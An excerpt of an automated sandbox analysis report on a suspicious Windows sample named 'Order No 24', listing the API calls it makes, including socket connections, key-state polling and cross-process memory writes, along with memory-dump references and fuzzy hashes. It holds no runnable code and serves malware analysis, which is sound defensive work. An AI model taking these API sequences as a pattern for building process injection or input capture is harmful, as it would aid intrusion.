                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009D1349
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 0099B64F
                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BB369
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 009BB413
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 009BB41B
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 009BB429
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 009BB431
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 009BDBD7
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009BDBF4
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009BDC2C
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009BDC52
                                                                                                                                  • _wcsstr.LIBCMT ref: 009BDC5C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009BBC90
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBCC2
                                                                                                                                  • __itow.LIBCMT ref: 009BBCDA
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009BBD00
                                                                                                                                  • __itow.LIBCMT ref: 009BBD11
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009850E6: _wcsncpy.LIBCMT ref: 009850FA
                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,009C60C3), ref: 009C6369
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009C60C3), ref: 009C6374
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C6388
                                                                                                                                  • _wcsrchr.LIBCMT ref: 009C63AA
                                                                                                                                    • Part of subcall function 009C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009C60C3), ref: 009C63E0
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3633006590-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009D8BD3
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8BE2
                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 009D8BFE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3701255441-0
                                                                                                                                  • Opcode ID: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                                                                                                                  • Instruction ID: 7c4b292ce7a3bce6c5dfa2f36f78a63af232fafa12769bda1bdb5b94bebaa562
                                                                                                                                  • Opcode Fuzzy Hash: 0808dc58d26d380ea530277204d7a1986b97456e10e8f48aa811144727ea9b81
                                                                                                                                  • Instruction Fuzzy Hash: 39218172640114AFCB10EFA8CC55F7E77ADEF88710F04845AF95697392CB74E8028761
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 009D8441
                                                                                                                                  • GetForegroundWindow.USER32 ref: 009D8458
                                                                                                                                  • GetDC.USER32(00000000), ref: 009D8494
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 009D84A0
                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 009D84DB
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                  • Opcode ID: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                                                                                                                  • Instruction ID: 4346595cb9496d090c06d284934debf24a9faf906dc952b5c034e7057b91f8d6
                                                                                                                                  • Opcode Fuzzy Hash: d9706ecd1a31c70e7d257c245ee22ecdbdc04d56d5dafe9c28a7e73f7a7928c6
                                                                                                                                  • Instruction Fuzzy Hash: 97215176A00204AFD700EFA5D985BAEBBE5EF88301F04C479F85997352DB70AD41CB60
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                                                                                                                  • BeginPath.GDI32(?), ref: 0099B009
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0099B033
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                  • Opcode ID: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                                                                                                                  • Instruction ID: 0407fee56f97240af4c0c4db4f2ee41a9ddbd4750d3aa1ad6e92111dd11bd63d
                                                                                                                                  • Opcode Fuzzy Hash: e0535ce4dfd11aecc95f2a9738a085a5a661989e2e085fe922fd083d0a180799
                                                                                                                                  • Instruction Fuzzy Hash: E521AFB9800309EFDB10DFD9ED48BAABB6CFB52355F15431AF525920A0D3B58883CB90
                                                                                                                                  APIs
                                                                                                                                  • __calloc_crt.LIBCMT ref: 009A21A9
                                                                                                                                  • CreateThread.KERNEL32(?,?,009A22DF,00000000,?,?), ref: 009A21ED
                                                                                                                                  • GetLastError.KERNEL32 ref: 009A21F7
                                                                                                                                  • _free.LIBCMT ref: 009A2200
                                                                                                                                  • __dosmaperr.LIBCMT ref: 009A220B
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2664167353-0
                                                                                                                                  • Opcode ID: 2ddb5f5e772136964634dfee688ad84b704547bf704af5fe0b35bfd36f26b479
                                                                                                                                  • Instruction ID: cc628d652ebea11f75c40e0e20232923a32f54cea11cdaa1f454e2e78ed9aec6
                                                                                                                                  • Opcode Fuzzy Hash: 2ddb5f5e772136964634dfee688ad84b704547bf704af5fe0b35bfd36f26b479
                                                                                                                                  • Instruction Fuzzy Hash: B211C8331083066FDB15AFE9DC42F6B7BA8EF87770B100429FD2486151DB71D81286E1
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                                                                                                                  • GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                  • Opcode ID: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                                                                                                                  • Instruction ID: e13ffeb58ba7f76e61c471c4d7c33f12bfc0efa357fb45ba224b6d745f1a176c
                                                                                                                                  • Opcode Fuzzy Hash: bce71634041f8153caba6f5ceb8c85ae221ec2f4a0c4741341da4259af9bfaa4
                                                                                                                                  • Instruction Fuzzy Hash: CE013C72210208BFDB108FE9DD48DAB7FADEF8A765B100529F945C3260DA71DC82CB61
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.OLE32 ref: 009B9ADC
                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                                                                                                                  • CLSIDFromString.OLE32(?,?), ref: 009B9B21
                                                                                                                                  Similarity
                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3897988419-0
                                                                                                                                  • Opcode ID: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                                                                                                                  • Instruction ID: ef17fe7bae4682569559db4b1774bdb429d49baf704eee42b95cd15255079f72
                                                                                                                                  • Opcode Fuzzy Hash: 3607b0e20a3437591594c965b418df132b5e2db3a3a77f7ba287254bd0ef8533
                                                                                                                                  • Instruction Fuzzy Hash: EC018F7A62022CBFDB108FD4EE44BAA7AEDEF44361F148028FA05D2210D770DD469BA0
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A74
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A82
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C7A8A
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 009C7A94
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                  • Opcode ID: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                                                                                                                  • Instruction ID: 90072e661afcd169f612c522bb6e42a8a8329af3c2936b86e3f45d09f10f7d9b
                                                                                                                                  • Opcode Fuzzy Hash: 43e6975afc379fdf1659baed05ccecf5f79c9627c84433747eb737bae683fdf6
                                                                                                                                  • Instruction Fuzzy Hash: 4E010536C0461DABDF00EFE5E888AEDFB78FB18711F000559E502B2150DB3496528BA2
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009BAADA
                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAE4
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAF3
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAAFA
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009BAB10
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
• Instruction ID: 7ab4e8404768c1693cf2ed509aeb530c2fe054de047bc889e14288a7babae9fd
• Opcode Fuzzy Hash: 8f86130ae6a83db47fdfdc604fcc3f65073ba3f3cbf93f4ba7c58549eb438dde
• Instruction Fuzzy Hash: 50F062762102186FEB114FE4EC88EA73B6DFF45765F000129FA56C7190CB609C43CB61
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
• Instruction ID: e04f832c80cf6c570a17e871c676206b97bafea3b2b0b00c843a27a44d279736
• Opcode Fuzzy Hash: b9238eeb1facb986b294c1dd53d8656fe6a3ffc5e9a3b67ecf8e32fa0f0ef882
• Instruction Fuzzy Hash: C3F04F762002086FEB119FE4AD89EAB3BADFF49765F400519FA45C7190DB609C43CA71
APIs
• GetDlgItem.USER32(?,000003E9), ref: 009BEC94
• GetWindowTextW.USER32(00000000,?,00000100), ref: 009BECAB
• MessageBeep.USER32(00000000), ref: 009BECC3
• KillTimer.USER32(?,0000040A), ref: 009BECDF
• EndDialog.USER32(?,00000001), ref: 009BECF9
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
• Instruction ID: a435b3ded0ff436e806811ded0d6538ddddf1a69b7de93167d13ff3d428be6d0
• Opcode Fuzzy Hash: ed967a6b71164c77a69fbfbf4e617ca22ea6fec60fc1478925e367f3bbecbd5b
• Instruction Fuzzy Hash: 47018131500708ABEB249B90DF4EBD67BBCFB00715F000959B582A14E0DBF4AA9ACB80
APIs
• EndPath.GDI32(?), ref: 0099B0BA
• StrokeAndFillPath.GDI32(?,?,009FE680,00000000,?,?,?), ref: 0099B0D6
• SelectObject.GDI32(?,00000000), ref: 0099B0E9
• DeleteObject.GDI32 ref: 0099B0FC
• StrokePath.GDI32(?), ref: 0099B117
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
• Instruction ID: 20bc604fb8896cd1951e05d913ad87d00d1ea34910ca3963c8ba4373df030874
• Opcode Fuzzy Hash: 662ea77bebad4581f4f476c19933acf66537edf3ac46ae9da6472a81be8c3765
• Instruction Fuzzy Hash: E6F0F639004208AFCB21DFE9ED08B647F64A742366F088314F429440F0C7368997CF50
APIs
• CoInitialize.OLE32(00000000), ref: 009CF2DA
• CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CF2F2
• CoUninitialize.OLE32 ref: 009CF555
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                                  • Opcode ID: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                                                                                                                  • Instruction ID: 44550724a8a282995f0b44f0b7223810053059eab5fce45703cc1484c62bd54f
                                                                                                                                  • Opcode Fuzzy Hash: 875c057d3ea5e58aa87fc4c0f7f6ed50183bbccb4da61f2593aca7601d7d1d60
                                                                                                                                  • Instruction Fuzzy Hash: E1A10BB2504201AFD700EFA4C891EABB7ECEFD8714F00495DF55597292EB70EA49CB62
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009CE85D
                                                                                                                                  • CoCreateInstance.OLE32(00A0DA7C,00000000,00000001,00A0D8EC,?), ref: 009CE876
                                                                                                                                  • CoUninitialize.OLE32 ref: 009CE893
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
• API String ID: 2126378814-24824748
• Opcode ID: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
• Instruction ID: 33dc0cc82f3d81d2c9d4f53102552eba920ce5463262180773fa89d5a3a60053
• Opcode Fuzzy Hash: 96ce3bdecf7648d637f0c956cb7547a321078b40d305bfb2673d4e03acb3905a
• Instruction Fuzzy Hash: 95A13775A043019FCB14EF14C884E2ABBE9BF89710F14895DF9969B3A1CB31ED45CB92
APIs
• __startOneArgErrorHandling.LIBCMT ref: 009A32ED
  • Part of subcall function 009AE0D0: __87except.LIBCMT ref: 009AE10B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: ErrorHandling__87except__start
• String ID: pow
• API String ID: 2905807303-2276729525
• Opcode ID: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
• Instruction ID: 8b7b720a297336b87b1cf52b9a3dba03b9e344df076b7d817024fd970d2d2ba6
• Opcode Fuzzy Hash: 66e4a235922aa1a1c641071afedbb93b73b37ea06c8c12d138b293c63aa0af87
• Instruction Fuzzy Hash: 2F514B31A0C20296CF15B758C94137A3B9CDB83750F60CD68F8E5822A9DF388D959BC6
APIs
• CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00A1DC50,?,0000000F,0000000C,00000016,00A1DC50,?), ref: 009C4645
  • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
  • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
• CharUpperBuffW.USER32(?,?,00000000,?), ref: 009C46C5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                  • API String ID: 3797816924-776492005
                                                                                                                                  • Opcode ID: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                                                                                                                  • Instruction ID: bd74997649c60f59627754e133547cc357aad71553b759e142d449eb526c8c77
                                                                                                                                  • Opcode Fuzzy Hash: 5298a98622a6013ada46f289278952fe3c3faa08c8d3a0f68ad0aac8e815ef03
                                                                                                                                  • Instruction Fuzzy Hash: CB417C75A002099FCF05EFA4C891FAEB7B8BF89304F148459E916AB392DB34DD41CB51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC08,?,?,00000034,00000800,?,00000034), ref: 009C4335
                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009BC1D3
                                                                                                                                    • Part of subcall function 009C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 009C4300
                                                                                                                                    • Part of subcall function 009C422F: GetWindowThreadProcessId.USER32(?,?), ref: 009C425A
                                                                                                                                    • Part of subcall function 009C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C426A
                                                                                                                                    • Part of subcall function 009C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 009C4280
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC240
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009BC28D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                  • Opcode ID: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                                                                                                                  • Instruction ID: f58b0cd348ca3d6b0e4f74993307de0878b128c10d87af5a307da5c48124e071
                                                                                                                                  • Opcode Fuzzy Hash: 77ff236956d2b3a3aeaa5ca72bbf7ff6d874c61112b4e99f4e23fc3823a63129
                                                                                                                                  • Instruction Fuzzy Hash: 25412C72A0021CAFDB11DFA4CD92FEEB7B8AF49710F004099FA55B7181DA71AE45CB61
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00A1DC00,00000000,?,?,?,?), ref: 009EA6D8
                                                                                                                                  • GetWindowLongW.USER32 ref: 009EA6F5
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009EA705
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long
                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                  • Opcode ID: dbf99d262fb182d75e7012c3c54e2d338c9c578c64401c149cc107c8b9d2e154
